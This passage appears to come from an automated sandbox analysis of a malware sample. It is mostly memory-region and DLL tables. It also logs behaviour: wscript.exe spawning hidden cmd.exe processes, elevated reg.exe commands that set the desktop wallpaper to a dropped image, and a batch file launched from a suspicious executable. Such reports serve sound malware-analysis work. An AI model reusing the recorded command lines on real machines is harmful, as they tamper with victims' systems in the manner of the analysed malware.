| locale.nls | 0x04f80000 | 0x0503dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005040000 | 0x05040000 | 0x0513ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005140000 | 0x05140000 | 0x052c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000052d0000 | 0x052d0000 | 0x0530ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005310000 | 0x05310000 | 0x05313fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005320000 | 0x05320000 | 0x0532ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005330000 | 0x05330000 | 0x054b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000054c0000 | 0x054c0000 | 0x068bffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x068c0000 | 0x06bf6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006c00000 | 0x06c00000 | 0x06cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006d00000 | 0x06d00000 | 0x06db7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000006dc0000 | 0x06dc0000 | 0x06ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006ec0000 | 0x06ec0000 | 0x06efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006f00000 | 0x06f00000 | 0x06ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007000000 | 0x07000000 | 0x07003fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007010000 | 0x07010000 | 0x0704ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007050000 | 0x07050000 | 0x0714ffff | Private Memory | rw |
|
|
|
- |
| wshom.ocx | 0x07150000 | 0x0715cfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000007160000 | 0x07160000 | 0x07160fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x07170000 | 0x07173fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x07180000 | 0x07183fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000007190000 | 0x07190000 | 0x07190fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000071a0000 | 0x071a0000 | 0x071affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000071b0000 | 0x071b0000 | 0x071effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000071f0000 | 0x071f0000 | 0x072effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000072f0000 | 0x072f0000 | 0x0732ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007330000 | 0x07330000 | 0x0742ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007430000 | 0x07430000 | 0x0746ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007470000 | 0x07470000 | 0x0756ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007570000 | 0x07570000 | 0x075affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000075b0000 | 0x075b0000 | 0x076affff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db | 0x076b0000 | 0x076f2fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x07700000 | 0x0778afff | Memory Mapped File | r |
|
|
|
- |
| propsys.dll.mui | 0x07790000 | 0x077a0fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x077b0000 | 0x077c2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000077d0000 | 0x077d0000 | 0x077d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x077e0000 | 0x077e3fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x73880000 | 0x73b40fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x73b50000 | 0x73caffff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x73cb0000 | 0x73eb6fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x73ec0000 | 0x74001fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x74010000 | 0x74026fff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x74030000 | 0x7405afff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x74060000 | 0x74082fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x74090000 | 0x740c4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x74170000 | 0x74186fff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x74190000 | 0x74199fff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x741a0000 | 0x741acfff | Memory Mapped File | rwx |
|
|
|
- |
| mpoav.dll | 0x741c0000 | 0x741d5fff | Memory Mapped File | rwx |
|
|
|
- |
| amsi.dll | 0x741e0000 | 0x741ecfff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x741f0000 | 0x7426efff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x74270000 | 0x742effff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74310000 | 0x7433efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74340000 | 0x74352fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x745a0000 | 0x745bafff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x74880000 | 0x749f4fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x74c80000 | 0x74cd7fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x74ce0000 | 0x74d21fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76fe0000 | 0x77061fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77070000 | 0x7707dfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77080000 | 0x770b5fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x770d0000 | 0x77161fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77170000 | 0x77259fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ea08000 | 0x7ea08000 | 0x7ea0afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea0b000 | 0x7ea0b000 | 0x7ea0dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea0e000 | 0x7ea0e000 | 0x7ea10fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea11000 | 0x7ea11000 | 0x7ea13fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea14000 | 0x7ea14000 | 0x7ea16fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea17000 | 0x7ea17000 | 0x7ea19fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea1a000 | 0x7ea1a000 | 0x7ea1cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea1d000 | 0x7ea1d000 | 0x7ea1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007ea20000 | 0x7ea20000 | 0x7eb1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb20000 | 0x7eb20000 | 0x7eb42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb45000 | 0x7eb45000 | 0x7eb45fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb48000 | 0x7eb48000 | 0x7eb48fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb4a000 | 0x7eb4a000 | 0x7eb4cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb4d000 | 0x7eb4d000 | 0x7eb4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | Wscript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = size |
|
1 | |
| Read | - | size = 267, size_out = 267 |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | show_window = SW_HIDE |
|
2 |
Module (14)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | amsi.dll | base_address = 0x741e0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75310000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernelbase.dll | base_address = 0x75190000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wscript.exe | base_address = 0x860000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\wscript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryProtectedPolicy, address_out = 0x75259ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiInitialize, address_out = 0x741e3d40 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiScanString, address_out = 0x741e40e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = ResolveDelayLoadedAPI, address_out = 0x75244e60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = ResolveDelayLoadsFromDll, address_out = 0x752c0770 |
|
1 | |
| Get Address | c:\windows\syswow64\wscript.exe | function = 1, address_out = 0x86b650 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x754a4cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\amsi.dll | function = AmsiUninitialize, address_out = 0x741e3f20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 191703 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
1 |
Process #12: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\iTIcBPF1.bmp" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:37, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x320 |
| Parent PID | 0xe8c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
354
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000810000 | 0x00810000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x0081ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x00823fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x00831fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x00830000 | 0x00839fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x00853fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x008e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x008f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00901fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00910000 | 0x009cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00ae0000 | 0x00bbefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| reg.exe | 0x01110000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x0516ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05170000 | 0x054a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x74d30000 | 0x74d8bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x770c0000 | 0x770c6fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ece0000 | 0x7ece0000 | 0x7eddffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ede0000 | 0x7ede0000 | 0x7ee02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee06000 | 0x7ee06000 | 0x7ee06fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee09000 | 0x7ee09000 | 0x7ee0bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee0c000 | 0x7ee0c000 | 0x7ee0efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee0f000 | 0x7ee0f000 | 0x7ee0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = Wallpaper, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\iTIcBPF1.bmp, size = 102, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x1110000 |
|
1 |
Process #13: reg.exe
12
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:36, Reason: Child Process |
| Unmonitor | End Time: 00:01:40, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1a4 |
| Parent PID | 0xe8c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2F4
0x
CD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000009c0000 | 0x009c0000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x009cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x009d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x009e1fff | Private Memory | rw |
|
|
|
- |
| reg.exe.mui | 0x009e0000 | 0x009e9fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00a03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00a93fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x00aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00ab1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b2ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00b30000 | 0x00bedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00e10000 | 0x00eeefff | Memory Mapped File | r |
|
|
|
- |
| reg.exe | 0x01110000 | 0x01162fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x0516ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05170000 | 0x054a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x74d30000 | 0x74d8bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x770c0000 | 0x770c6fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e5f0000 | 0x7e5f0000 | 0x7e6effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e6f0000 | 0x7e6f0000 | 0x7e712fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e718000 | 0x7e718000 | 0x7e71afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e71b000 | 0x7e71b000 | 0x7e71dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e71e000 | 0x7e71e000 | 0x7e71efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e71f000 | 0x7e71f000 | 0x7e71ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Control Panel\Desktop | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Control Panel\Desktop | value_name = WallpaperStyle, data = 0, size = 4, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x1110000 |
|
1 |
Process #14: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Journal.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:38, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcd4 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
788
0x
87C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x04cfffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
